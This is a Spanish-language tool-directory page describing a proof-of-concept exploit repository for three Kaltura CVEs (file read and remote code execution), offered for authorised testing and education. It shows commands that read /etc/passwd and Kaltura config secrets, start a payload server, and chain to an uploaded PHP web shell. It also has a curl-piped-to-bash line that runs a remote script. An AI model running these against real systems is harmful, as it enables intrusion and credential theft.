Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-19912-CVE-2026-19913-CVE-2026-19914 — Explotaciones de prueba de concepto para CVE-2026-19912, CVE-2026-19913 y CVE-2026-19914, que demuestran lectura de archivos y ejecución remota de código en Kaltura, destinadas a pruebas de seguridad autorizadas y fines educativos. | Kitploit
Herramientas/GitHubGitHub/horkimhab/cve-2026-19912-cve-2026-19913-cve-2026-19914
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubhorkimhab/cve-2026-19912-cve-2026-19913-cve-2026-19914

CVE-2026-19912-CVE-2026-19913-CVE-2026-19914

Explotaciones de prueba de concepto para CVE-2026-19912, CVE-2026-19913 y CVE-2026-19914, que demuestran lectura de archivos y ejecución remota de código en Kaltura, destinadas a pruebas de seguridad autorizadas y fines educativos.

Ver Repositorio
hace 8h 25mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-19912, CVE-2026-19913, CVE-2026-19914

Donar

Ayuda a mantener este proyecto

Si encuentras útil este proyecto, considera apoyar su mantenimiento continuo a través de PayPal o ABA Mobile.

❤️ ១០% នៃការបរិច្ចាគរបស់អ្នក នឹងត្រូវបានបរិច្ចាគជូនមន្ទីរពេទ្យគន្ធបុប្ផា។

❤️ El diez por ciento de cada donación se destina al Hospital Infantil Kantha Bopha.

Elige un método de pago

Donar de forma segura con PayPal

Código QR de donación ABA Mobile
Escanea con ABA Mobile · Haz clic para ampliar

⚡ Uso sencillo

Ejecuta la última versión del script de descarga externa directamente desde GitHub:

root@kitploit:~
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)

Este comando requiere Bash y curl. Revisa el script remoto antes de ejecutarlo si no confías en la fuente.

Usa este proyecto solo en entornos seguros y autorizados, como:

  • Máquinas virtuales locales
  • Contenedores Docker
  • Configuraciones de laboratorio aisladas
  • Entornos de pruebas de penetración autorizados

Configuración de ejemplo:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# El proyecto usa Python, sigue los pasos a continuación

# Crea un entorno virtual
python -m venv venv

# Activa el entorno virtual

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Instala los requisitos
pip install -r requirements.txt

Ejemplo de uso:

root@kitploit:~
# 1. Lectura de archivos (la más fiable, funciona como se describe en el artículo)
python3 kaltura_poc.py fileread http://127.0.0.1 -f /etc/passwd
python3 kaltura_poc.py fileread http://127.0.0.1 \
    -f /opt/kaltura/app/configurations/local.ini --try-versions

# 2. Solo el servidor de payloads (úsalo con Burp / curl manualmente)
python3 kaltura_poc.py serve --lport 8888

# 3. Esqueleto de la cadena completa
python3 kaltura_poc.py rce http://127.0.0.1 \
    --lhost 172.17.0.1 --lport 8888 \
    --payload stdclass \
    --shell '../../../../../../../../var/www/html/shell.php'

Créditos o Referencias

  • https://anddone-git.github.io/2026/one-parameter-two-bugs/

📚 Repositorio Educativo de Investigación en Seguridad

Un repositorio para aprender, probar e investigar conceptos de ciberseguridad en entornos controlados.


⚠️ Aviso de Seguridad y Legal

Propósito

Este repositorio es solo para investigación de seguridad educativa y autorizada.

Está diseñado para ayudar a los usuarios a aprender sobre:

  • Vulnerabilidades de seguridad
  • Conceptos de sandbox y aislamiento
  • Prácticas de codificación segura y defensiva

Uso Autorizado Únicamente

Usa este repositorio solo en entornos donde tengas permiso, como:

  • Laboratorios personales o máquinas virtuales
  • Entornos Docker o aislados
  • Pruebas de penetración autorizadas
  • Formación en ciberseguridad o investigación académica

El uso no autorizado o ilegal está estrictamente prohibido.


Sin Responsabilidad

El autor y los colaboradores no son responsables de ningún daño, uso indebido, problema legal o pérdida causada por este proyecto.

Al usar este repositorio, aceptas que:

  • Eres responsable de tus propias acciones
  • Lo usarás de forma legal y ética
  • El proyecto se proporciona sin garantía

Uso Ético

Este proyecto está destinado a:

  • Investigación de seguridad defensiva
  • Educación en ciberseguridad
  • Concienciación sobre vulnerabilidades
  • Investigación de sistemas y software seguros

Por favor, sigue las prácticas de divulgación responsable y cumple con todas las leyes aplicables.


Contacto

Para divulgación responsable o colaboración, contacta al mantenedor del repositorio a través de GitHub.


Proyecto Relacionado

Explora la Colección de PoC CVE para obtener recursos adicionales de pruebas de concepto de CVE destinados a investigación y educación de seguridad autorizada.

Descargar herramienta